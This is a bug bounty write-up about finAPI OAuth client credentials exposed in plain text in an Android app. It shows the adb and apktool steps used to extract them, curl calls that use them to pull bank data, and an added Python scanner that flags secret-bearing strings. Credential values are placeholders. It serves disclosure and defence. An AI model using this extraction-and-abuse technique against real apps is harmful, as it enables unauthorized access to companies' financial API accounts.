WRITE UP – finAPI (Open Banking API) OAuth credentials exposed in plain text in Android app


Introduction:

Hi everyone, it’s been a while since my last post but I’m back. I want to tell you a short story about a REDACTED bug bounty program and why you should always check the basic payloads, because you will be surprised how often they work. (Never store credentials in plain text inside an Android application.)

If you like bug bounty writeups, please check my handbook, Bug Bounty Write Ups Collection.


Report Summary:

Hi REDACTED team, I was able to find the finAPI OAuth credentials exposed in plain text in your REDACTED Android application.

Proof of concept:

1.- Get the latest REDACTED Android application. In my case I installed it on my phone, connected the phone in debug mode and pulled the APK with adb (com.REDACTED.android.main is the APK package name):

omespino@h0st:~# adb pull data/app/com.REDACTED.android.main/base.apk

2.- Then I decompiled the APK with apktool:

omespino@h0st:~# apktool d base.apk

3.- Then I just grepped the decompiled resources for “client_secret” to find the finAPI OAuth URL:

omespino@h0st:~# grep -ihr --color client_secret ./base | head -1 

<string name="url_finapi_oauth">
https://live.finapi.io/oauth/token?grant_type=client_credentials&amp;client_id=00000000-0000-0000-0000-00000000&amp;client_secret=00000000-0000-0000-0000-00000000
</string>

4.- At this point, anyone could start using finAPI on behalf of your company:

# first we need to get an access token from finAPI
# finAPI POST /oauth/token documentation https://docs.finapi.io/#post-/oauth/token

omespino@h0st:~# curl -sX POST "https://live.finapi.io/oauth/token?grant_type=client_credentials&client_id=00000000-0000-0000-0000-00000000&client_secret=00000000-0000-0000-0000-00000000" | json_pp

{
   "token_type" : "bearer",
   "expires_in" : 1347,
   "scope" : "all",
   "access_token" : "IlR3byByb2FkcyBkaXZlcmdlZCBpbiBhIHdvb2QgYW5kIEkglyBJIHRvb2sgdGhlIG9uZSBsZXNzIHRyYXZlbGVkIGJ5LCBhbmQgdGhhdCBoYXMgbWFkZSBhbGwgdGhlIGRpZmZlcmVuY2Ui"
}

# then we can use the token to abuse finAPI and get bank information
# finAPI GET /api/v1/banks documentation https://docs.finapi.io/#get-/api/v1/banks

omespino@h0st:~# curl -H 'Authorization: Bearer IlR3byBy...lcmVuY2Ui' https://live.finapi.io/api/v1/banks | json_pp

{
   "banks" : [
      {
         "supportedDataSources" : [
            "XXXXX_SERVER"
         ],
         "location" : "XX",
         "blz" : "903123123",
         "lastSuccessfulCommunication" : "201X-0X-0X 13:37:00.000",
         "loginFieldUserId" : "Onlinebanking-ID",
         "isCustomerIdPassword" : false,
         "isTestBank" : true,
         "isSupported" : true,
         "name" : "XXX-XXXXXXXsystem"
      },
      -------------- REDACTED -------------
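
As an added example (not part of the original writeup or of finAPI’s own tooling), here is a small Python check a defender or app reviewer could run over the res/values/strings.xml that apktool extracts. It flags string resources that carry a credential in a URL query string, exactly the pattern of the url_finapi_oauth resource above. The sample strings.xml is constructed to mirror that finding, and the list of sensitive parameter names is an assumption.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import parse_qs, urlsplit

# Query parameters that should never be shipped inside a client app
# (assumed, illustrative list; extend for your own API vendors).
SENSITIVE_PARAMS = {"client_secret", "secret", "password", "api_key", "apikey", "access_token"}
# Resource names that hint at a credential even when the value is not a URL.
SENSITIVE_NAME_RE = re.compile(r"(secret|password|api_?key|token)", re.IGNORECASE)

# Constructed sample modelled on the finding in this writeup (values are placeholders).
SAMPLE_STRINGS_XML = """<?xml version="1.0" encoding="utf-8"?>
<resources>
    <string name="app_name">Demo Banking</string>
    <string name="url_finapi_oauth">https://live.finapi.io/oauth/token?grant_type=client_credentials&amp;client_id=00000000-0000-0000-0000-00000000&amp;client_secret=00000000-0000-0000-0000-00000000</string>
    <string name="url_terms">https://example.com/terms?lang=en</string>
</resources>
"""


def find_embedded_credentials(strings_xml: str) -> list:
    """Scan an apktool-extracted strings.xml and return one finding per
    suspicious <string>: resource name, sensitive query parameters found,
    and a short preview that deliberately stops before the secret value."""
    root = ET.fromstring(strings_xml)
    findings = []
    for node in root.iter("string"):
        name = node.get("name", "")
        value = (node.text or "").strip()
        params = []
        if "://" in value:
            # ElementTree unescapes &amp; back to &, so the query string parses normally.
            query = parse_qs(urlsplit(value).query)
            params = sorted(p for p in query if p.lower() in SENSITIVE_PARAMS)
        if params or SENSITIVE_NAME_RE.search(name):
            findings.append({
                "name": name,
                "params": params,
                "preview": value[:40] + ("..." if len(value) > 40 else ""),
            })
    return findings


if __name__ == "__main__":
    for finding in find_embedded_credentials(SAMPLE_STRINGS_XML):
        print(f"{finding['name']}: sensitive params {finding['params']} ({finding['preview']})")
```

Run it against every res/values*/strings.xml after `apktool d`; the same check applies to any other string resource file where developers tend to drop vendor URLs.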


Environment and tools

adb Android Debug Bridge
apktool

Impact

Anyone could create, get, update, delete or import users, banks and communications in finAPI through the REDACTED finAPI account.

Well, that’s it. Share your thoughts, and if you have any doubts, comments or suggestions just drop me a line here or on Twitter @omespino. Read you later.
